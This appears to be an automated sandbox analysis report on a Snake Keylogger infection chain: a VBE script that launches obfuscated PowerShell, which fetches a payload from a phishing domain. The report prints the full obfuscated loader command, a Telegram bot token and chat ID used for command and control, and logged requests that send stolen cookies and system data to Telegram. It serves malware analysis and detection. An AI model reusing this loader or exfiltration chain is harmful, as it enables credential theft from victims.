              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. 
vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.BailDStrmoimpawBetjnHerrlAnamo DowaTun d SvaFBe.uiJubilTopke
Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7016, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-12T19:16:09.377332+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49697 | 104.21.80.1 | 443 | TCP
2025-03-12T19:16:29.511136+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49705 | 104.21.80.1 | 443 | TCP
2025-03-12T19:16:03.382838+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49695 | 158.101.44.242 | 80 | TCP
2025-03-12T19:16:06.742138+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49695 | 158.101.44.242 | 80 | TCP
2025-03-12T19:16:10.179713+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49698 | 158.101.44.242 | 80 | TCP
2025-03-12T19:15:58.878192+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49694 | 185.159.153.17 | 443 | TCP
2025-03-12T19:16:50.248199+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49713 | 149.154.167.220 | 443 | TCP
2025-03-12T19:16:41.818758+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49712 | 149.154.167.220 | 443 | TCP

              AV Detection

              Source: https://ooriginalused.com/lord/ReimaginAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/uAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.comAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/Reimagine.prmAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/Avira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/ReimagiAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/loAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/ReimagAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/Avira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/ReimagineAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lordAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lorAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/RAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/ReiAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/Reimagine.pAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/Reimagine.Avira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/ReimaAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/Reimagine.prmPAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/Reimagine.prAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/Reimagine.prmXRAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/know/HFJSDskkfpVJaPaR167.binMAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/ReAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/know/HFJSDskkfpVJaPaR167.binAvira URL Cloud: Label: phishing
              Source: 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8", "Chat_id": "1503224244", "Version": "4.4"}
              Source: msiexec.exe.5216.15.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8/sendMessage"}
              Source: 4500149631.vbe | Virustotal: Detection: 29%
              Source: 4500149631.vbe | ReversingLabs: Detection: 15%
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.2% probability

              Location Tracking

              barindex
              Source: unknown | DNS query: name: reallyfreegeoip.org
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_20678340 CryptUnprotectData, 15_2_20678340
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_20678A99 CryptUnprotectData, 15_2_20678A99
              Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49696 version: TLS 1.0
              Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49699 version: TLS 1.0
              Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49701 version: TLS 1.0
              Source: unknown | HTTPS traffic detected: 185.159.153.17:443 -> 192.168.2.8:49682 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 185.159.153.17:443 -> 192.168.2.8:49694 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49712 version: TLS 1.2
              Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32 | source: powershell.exe, 00000006.00000002.1609854802.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb | source: powershell.exe, 00000006.00000002.1577977343.00000000005EE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandlerV | source: powershell.exe, 00000006.00000002.1609854802.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 2065D069h | 15_2_2065CDC0

              Networking

              barindex
              Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49712 -> 149.154.167.220:443
              Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49713 -> 149.154.167.220:443
              Source: unknown | DNS query: name: api.telegram.org
              Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
              Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/03/2025%20/%2008:42:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: POST /bot7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8/sendDocument?chat_id=1503224244&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd636367b0dda3 | Host: api.telegram.org | Content-Length: 742
              Source: Joe Sandbox View | IP Address: 149.154.167.220
              Source: Joe Sandbox View | IP Address: 158.101.44.242
              Source: Joe Sandbox View | IP Address: 104.21.80.1
              Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknown | DNS query: name: checkip.dyndns.org
              Source: unknown | DNS query: name: reallyfreegeoip.org
              Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49698 -> 158.101.44.242:80
              Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49695 -> 158.101.44.242:80
              Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49697 -> 104.21.80.1:443
              Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49705 -> 104.21.80.1:443
              Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49694 -> 185.159.153.17:443
              Source: global traffic | HTTP traffic detected: GET /lord/Reimagine.prm HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Host: ooriginalused.com | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /know/HFJSDskkfpVJaPaR167.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Host: ooriginalused.com | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic | DNS traffic detected: DNS query: ooriginalused.com
              Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
              Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
              Source: unknown | HTTP traffic detected: POST /bot7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8/sendDocument?chat_id=1503224244&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd636367b0dda3 | Host: api.telegram.org | Content-Length: 742
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Wed, 12 Mar 2025 18:16:41 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020CBB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020CBB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
              Source: msiexec.exe, 0000000F.00000002.2232887715.0000000022BFA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://c.pki.goog/r/gsr1.crl0
              Source: msiexec.exe, 0000000F.00000002.2232805320.0000000022BA2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://c.pki.goog/r/r4.crl0
              Source: msiexec.exe, 0000000F.00000002.2232887715.0000000022BFA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020B8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://c.pki.goog/we1/K0UVAKe5N94.crl0
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
              Source: svchost.exe, 00000008.00000002.2217715412.0000025D1C400000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
              Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.8.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: edb.log.8.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: msiexec.exe, 0000000F.00000002.2232887715.0000000022BFA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://i.pki.goog/gsr1.crt0-
              Source: msiexec.exe, 0000000F.00000002.2232805320.0000000022BA2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://i.pki.goog/r4.crt0
              Source: msiexec.exe, 0000000F.00000002.2232887715.0000000022BFA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020B8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i.pki.goog/we1.crt05
              Source: powershell.exe, 00000003.00000002.1243751229.0000027592CBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1602163136.0000000005315000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
              Source: msiexec.exe, 0000000F.00000002.2232887715.0000000022BFA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020B8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://o.pki.goog/s/we1/8CI0%
              Source: powershell.exe, 00000006.00000002.1581497755.0000000004408000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000003.00000002.1221528154.0000027582C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1581497755.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
              Source: powershell.exe, 00000006.00000002.1581497755.0000000004408000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
              Source: powershell.exe, 00000003.00000002.1221528154.0000027582C51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.1581497755.00000000042B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBLr
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020CBB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020BC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020CBB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2230198077.0000000020BC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20a
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8/sendDocument?chat_id=1503
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enT
              Source: msiexec.exe, 0000000F.00000002.2230198077.0000000020C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBLr
              Source: powershell.exe, 00000006.00000002.1602163136.0000000005315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.1602163136.0000000005315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.1602163136.0000000005315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
              Source: svchost.exe, 00000008.00000003.1208730043.0000025D1C220000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
              Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021DA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2231687534.0000000021DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
              Source: powershell.exe, 00000006.00000002.1581497755.0000000004408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.1243751229.0000027592CBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1602163136.0000000005315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.c
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.co
              Source: powershell.exe, 00000003.00000002.1221528154.0000027582E77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2215442340.0000000002CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/
              Source: msiexec.exe, 0000000F.00000002.2229758829.00000000206F0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2215442340.0000000002CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/know/HFJSDskkfpVJaPaR167.bin
              Source: msiexec.exe, 0000000F.00000002.2215442340.0000000002CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/know/HFJSDskkfpVJaPaR167.binM
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/l
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lo
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lor
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/R
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Re
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Rei
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reim
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reima
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimag
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagi
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagin
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagine
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagine.
              Source: powershell.exe, 00000003.00000002.1221528154.000002758401C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ooriginalused.com/lord/Reimagine.p
